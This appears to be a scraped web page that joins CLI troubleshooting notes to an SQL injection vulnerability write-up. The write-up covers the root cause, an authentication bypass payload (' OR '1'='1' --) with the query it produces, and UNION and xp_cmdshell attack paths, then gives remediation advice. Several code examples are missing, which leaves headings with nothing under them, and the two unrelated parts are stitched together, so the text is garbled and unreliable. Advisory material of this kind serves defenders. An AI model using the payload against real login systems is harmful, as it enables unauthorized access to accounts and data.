Configuration File

The CLI reads configuration from ~/.kitploit/config.yaml by default. You can override this with the --config flag.

Troubleshooting

Connection Refused

If you see a connection refused error, verify that the server is running and accessible:

Authentication Failed

Ensure your API token is valid and has not expired. You can regenerate a token from the web interface under Settings → API Tokens.

Timeout Errors

For large scans, increase the timeout value:

## Vulnerability Details

### Root Cause

The application constructs SQL queries by directly concatenating user-supplied input into the query string without parameterization or sanitization:

SqlCommand cmd = new SqlCommand(query, connection);

Because the input is not parameterized, an attacker can inject arbitrary SQL syntax by supplying crafted values for the username or password fields.

Attack Vector

The vulnerability is exploitable remotely over the network without authentication. Any endpoint that accepts user input and passes it to the database layer is potentially vulnerable.

Authentication Bypass

A classic authentication bypass payload:

' OR '1'='1' --

This causes the query to evaluate as:

SELECT * FROM Users WHERE Username = '' OR '1'='1' --' AND Password = ''

Since '1'='1' is always true, the query returns all rows, and the application grants access to the first user in the result set — typically an administrator.

Data Exfiltration

An attacker can use UNION-based injection to extract arbitrary data from the database:

Remote Code Execution

If the database server has xp_cmdshell enabled and the application's database user has sufficient privileges, an attacker can execute arbitrary operating system commands:

  • Pivot to other systems on the internal network.

Remediation

Use Parameterized Queries

The primary and most effective remediation is to use parameterized queries (prepared statements) for all database interactions:

  • Web Application Firewall: Deploy a WAF to detect and block common SQL injection patterns.
  • Error Handling: Suppress detailed database error messages from being returned to the client.
  • Regular Audits: Conduct regular code reviews and security assessments.
